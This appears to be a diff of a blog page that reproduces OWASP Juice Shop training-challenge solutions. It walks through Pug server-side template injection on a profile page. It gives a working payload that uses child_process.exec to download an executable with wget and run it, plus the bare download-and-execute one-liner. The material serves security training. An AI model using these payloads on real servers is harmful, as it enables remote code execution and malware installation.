KarAshutosh/karashutosh.github.io/blogs/blog4.md

 ### **Infect the server with juicy malware by abusing arbitrary command execution**

 1. Perform the totally obvious Google search for `juicy malware` to find [https://github.com/J12934/juicy-malware](https://github.com/J12934/juicy-malware)
-2. Alternatively you also find three `.url` files with direct links in [http://localhost:3000/ftp/quarantine](http://localhost:3000/ftp/quarantine) but you’ll probably need to understand how to solve any of [Access a developer’s forgotten backup file](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_access_a_developers_forgotten_backup_file), [Access a salesman’s forgotten backup file](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_access_a_salesmans_forgotten_backup_file) or [Access a misplaced SIEM signature file](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_access_a_misplaced_siem_signature_file) first.
+2. Alternatively you also find three `.url` files with direct links in [http://localhost:3000/ftp/quarantine](http://localhost:3000/ftp/quarantine) but you'll probably need to understand how to solve any of [Access a developer's forgotten backup file](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_access_a_developers_forgotten_backup_file), [Access a salesman's forgotten backup file](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_access_a_salesmans_forgotten_backup_file) or [Access a misplaced SIEM signature file](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_access_a_misplaced_siem_signature_file) first.
 3. Your goal is to use RCE to make the server download and execute the malware version for the server OS, so on Linux you might want to run something like `wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware`
 4. You probably realized by now that [http://localhost:3000/profile](http://localhost:3000/profile) is not an Angular page?
 This page is written using [Pug](https://pugjs.org/) which happens to be a Template engine and therefore perfectly suited for SSTi mischief.
 5. Set your *Username* to `1+1` and click *Set Username*.
 Your username will be just shown as `1+1` under the profile picture.
 6. Trying template injection into Pug set *Username* to `#{1+1}` and click *Set Username*.
 Your username will now be shown as `2` under the profile picture!
-7. Craft a payload that will abuse the lack of encapsulation of JavaScript’s `global.process` object to dynamically load a library that will allow you to spawn a process on the server that will then download and execute the malware.
+7. Craft a payload that will abuse the lack of encapsulation of JavaScript's `global.process` object to dynamically load a library that will allow you to spawn a process on the server that will then download and execute the malware.
 8. The payload might look like `#{global.process.mainModule.require('child_process').exec('wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware')}`.
 Submit this as *Username* and (on a Linux server) the challenge should be marked as solved

-ℹ️ Remember that you need to use the right malware file for your server’s operation system and also their synonym command for `wget`.
+ℹ️ Remember that you need to use the right malware file for your server's operation system and also their synonym command for `wget`.

 ### **Embed an XSS payload into our promo video**